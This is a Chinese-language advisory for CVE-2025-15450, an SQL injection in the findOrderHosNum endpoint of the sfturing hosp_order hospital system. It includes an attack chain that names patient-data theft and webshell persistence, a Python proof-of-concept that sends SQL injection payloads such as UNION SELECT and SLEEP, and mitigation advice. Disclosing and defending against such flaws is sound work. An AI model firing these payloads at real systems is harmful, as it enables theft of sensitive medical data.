CVE-2025-15450 sfturing hosp_order SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15450

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

sfturing hosp_order

漏洞概述

CVE-2025-15450是sfturing hosp_order系统中存在的SQL注入漏洞。该系统是一款医院订单管理系统。漏洞存在于/ssm_pro/orderHos/目录下的findOrderHosNum函数中，攻击者可以通过hospitalAddress和hospitalName参数注入恶意SQL语句。由于该漏洞可远程利用且不需要高权限认证，攻击者可以在低权限账户下执行SQL注入攻击，获取数据库中的敏感信息，包括患者数据、订单信息等。漏洞评分6.3属于中等严重程度，但考虑到涉及医疗数据的敏感性，实际危害可能更为严重。攻击者无需用户交互即可发起攻击，且公开的漏洞利用代码降低了攻击门槛。该产品未使用版本控制机制，导致无法准确确定受影响和未受影响的版本范围。

技术细节

该SQL注入漏洞存在于findOrderHosNum函数中，攻击者通过操纵hospitalAddress或hospitalName参数注入恶意SQL代码。由于系统未对用户输入进行充分的参数化查询或输入过滤，攻击者可以在参数值中插入SQL语句片段，改变原始查询逻辑。在CVSS 3.1评分体系中，攻击向量为网络级别（AV:N），需要低权限认证（PR:L），无需用户交互（UI:N）。攻击成功后可能导致机密性（C:L）、完整性（I:L）和可用性（A:L）方面的低级别影响。攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。受影响的代码版本为627f426331da8086ce8fff2017d65b1ddef384f8之前的版本。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标系统，识别sfturing hosp_order系统的存在

STEP 2

步骤2

定位端点：访问/ssm_pro/orderHos/目录下的findOrderHosNum接口

STEP 3

步骤3

漏洞探测：通过hospitalAddress或hospitalName参数发送SQL注入测试payload

STEP 4

步骤4

漏洞利用：利用UNION注入或盲注技术提取数据库敏感信息

STEP 5

步骤5

数据窃取：获取患者信息、订单数据等敏感医疗数据

STEP 6

步骤6

持久化访问：可能通过写入webshell或创建后门账户维持访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15450 SQL Injection PoC
# Target: sfturing hosp_order system
# Vulnerable Parameter: hospitalAddress/hospitalName
# Note: This is for educational and authorized testing purposes only

def test_sql_injection(url, param_name, param_value):
    """Test for SQL injection vulnerability"""
    target_url = f"{url}/ssm_pro/orderHos/findOrderHosNum"
    
    # Payload: Basic SQL injection test
    payloads = [
        "'",
        "' OR '1'='1",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
        "' OR 1=1--"
    ]
    
    for payload in payloads:
        params = {param_name: param_value + payload}
        try:
            response = requests.get(target_url, params=params, timeout=10)
            # Check for SQL error messages or time delays
            if response.status_code == 200:
                print(f"[*] Testing payload: {payload}")
                if "sql" in response.text.lower() or "error" in response.text.lower():
                    print(f"[!] Potential SQL injection detected with payload: {payload}")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-15450.py <url> <param_name>")
        print("Example: python cve-2025-15450.py http://target.com hospitalAddress")
        sys.exit(1)
    
    target_url = sys.argv[1]
    param_name = sys.argv[2]
    
    print(f"[*] Testing CVE-2025-15450 SQL Injection on {target_url}")
    result = test_sql_injection(target_url, param_name, "test")
    
    if result:
        print("[!] Vulnerability confirmed!")
    else:
        print("[*] No obvious SQL injection detected")

影响范围

sfturing hosp_order <= 627f426331da8086ce8fff2017d65b1ddef384f8

防御指南

临时缓解措施

由于该产品未使用版本控制且厂商未响应安全披露，建议采取以下临时措施：1）使用Web应用防火墙拦截包含SQL注入特征的请求；2）实施输入过滤机制，对hospitalAddress和hospitalName参数进行严格验证；3）限制相关API的网络访问，仅允许受信任的IP地址访问；4）监控数据库日志，及时发现异常查询行为；5）考虑使用入侵检测系统（IDS）监控可疑的SQL注入尝试。建议用户关注官方仓库（https://github.com/sfturing/hosp_order/）的更新，并在条件允许时切换到更安全的替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15450
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15450
3 Details https://www.cvedetails.com/cve/CVE-2025-15450/
4 VulDB https://vuldb.com/cve/CVE-2025-15450
5 Link https://github.com/sfturing/hosp_order/
6 Link https://github.com/sfturing/hosp_order/issues/111
7 Link https://github.com/sfturing/hosp_order/issues/111#issue-3760306826
8 Link https://vuldb.com/?ctiid.339483
9 Link https://vuldb.com/?id.339483
10 Link https://vuldb.com/?submit.722925